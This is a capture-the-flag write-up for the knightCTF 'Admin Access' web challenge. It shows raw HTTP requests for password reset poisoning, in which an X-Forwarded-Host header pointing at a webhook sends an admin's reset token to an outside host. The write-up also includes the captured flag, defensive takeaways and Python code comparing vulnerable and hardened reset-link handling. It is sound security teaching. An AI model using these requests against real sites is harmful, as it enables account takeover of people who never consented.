knightCTF web/Admin Access

My solution for knightCTF web/Admin Access challenge

Challenge overview

The challenge presents a web application with a login system and password reset functionality. The goal is to gain admin access by exploiting vulnerabilities in the password reset mechanism.

Analysis

Hidden email address found in HTML comment: kctf2025@knightctf.com. Registration attempts with this email confirm it’s an existing admin account.

Password reset functionality is available at /reset-password

Token analysis
The application uses several types of session tokens:

  1. Logout token:
    eyJfZmxhc2hlcyI6W3siIHQiOlsiaW5mbyIsIllvdSBoYXZlIGJlZW4gbG9nZ2VkIG91dC4iXX1dfQ.Z476VQ.znufTcmUbyoU4Jqf8ZHeX5Ku-pc
    Decoded: {"_flashes":[{" t":["info","You have been logged out."]}]}

  2. Page refresh token:
    eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIlBsZWFzZSBsb2cgaW4gdG8gYWNjZXNzIHRoZSBkYXNoYm9hcmQuIl19XX0.Z475Zw.gxmNA7rq_1toqPuczGdiO77NkmM
    Decoded: {"_flashes":[{" t":["warning","Please log in to access the dashboard."]}]}

  3. Auth token:
    .eJyrVipILC4uzy9KUbJSKkktLjE0NjY3VNJRKi1OLcpLzE1FEa4FAHh-Dvo.Z475Cg.2I8JbpJSsORzxPT45TQ7NexfujI
    The tokens appear to be single-use, and the authentication token has an unusual format: unlike the two flash-message cookies it begins with a dot, and its payload does not decode to plain JSON.

Exploitation

The application is vulnerable to password reset poisoning via middleware manipulation, similar to the vulnerability described in PortSwigger’s lab.

Trigger password reset

POST /forgot-password HTTP/1.1
Host: 45.56.68.122:7474
X-Forwarded-Host: [WEBHOOK_URL]
Content-Type: application/x-www-form-urlencoded

email=kctf2025@knightctf.com

(screenshot: the reset token captured by the webhook)

Reset password

POST /reset-password HTTP/1.1
Host: 45.56.68.122:7474
Content-Type: application/x-www-form-urlencoded

token=CAPTURED_TOKEN&new_password=NEW_PASSWORD

The key is the X-Forwarded-Host header: the application builds the password reset link from it, so the link emailed to the admin points at our webhook instead of the real host, and the reset token arrives in the webhook's request log.

Flag:
KCTF{PaSsW0rD_ReSet_p0isOn1ng_iS_FuN}

Key takeaways

  1. Host header validation
    • Applications should validate and sanitize the X-Forwarded-Host header to prevent password reset poisoning attacks.
  2. Token security
    • Password reset tokens should be: single-use, time-limited, securely generated and properly validated
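The two takeaways above, and the header trick used in the exploitation section, illustrated in code. This is an added example, not the challenge application's source: `reset_link_vulnerable` builds the link the way the vulnerable app evidently does (origin taken from X-Forwarded-Host), `reset_link_hardened` uses a configured canonical host and only validates Host, and `ResetTokenStore` issues single-use, time-limited tokens. The canonical host value and the injectable `clock` parameter are assumptions made for the example.

```python
import hashlib
import secrets
import time
from urllib.parse import urlencode

# Canonical public origin of the app, taken from configuration, never from
# request headers. Constructed value matching the challenge host above.
CANONICAL_HOST = "45.56.68.122:7474"


def reset_link_vulnerable(headers, token):
    """Vulnerable pattern: the link origin comes from X-Forwarded-Host
    (falling back to Host), so whoever submits the forgot-password form
    chooses where the emailed reset link points."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"http://{host}/reset-password?{urlencode({'token': token})}"


def reset_link_hardened(headers, token):
    """Hardened pattern: forwarded headers are ignored entirely and Host is
    only checked against the allowlist; the link origin is always the
    configured host, so poisoning the request cannot redirect the link."""
    if headers.get("Host") != CANONICAL_HOST:
        raise ValueError("unexpected Host header")
    return f"https://{CANONICAL_HOST}/reset-password?{urlencode({'token': token})}"


class ResetTokenStore:
    """Single-use, time-limited reset tokens. Only a SHA-256 of each token is
    stored, so a leaked table does not yield tokens that can be redeemed."""

    def __init__(self, ttl_seconds=900, clock=time.time):
        self._ttl = ttl_seconds
        self._clock = clock      # injectable so expiry can be tested
        self._pending = {}       # sha256(token) -> (email, expires_at)

    def issue(self, email):
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        key = hashlib.sha256(token.encode()).hexdigest()
        self._pending[key] = (email, self._clock() + self._ttl)
        return token

    def redeem(self, token):
        """Return the email the token was issued for, or None if the token is
        unknown, already used, or expired. pop() makes every token single-use."""
        key = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.pop(key, None)
        if entry is None:
            return None
        email, expires_at = entry
        return email if self._clock() <= expires_at else None
```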
This post is licensed under CC BY 4.0 by the author.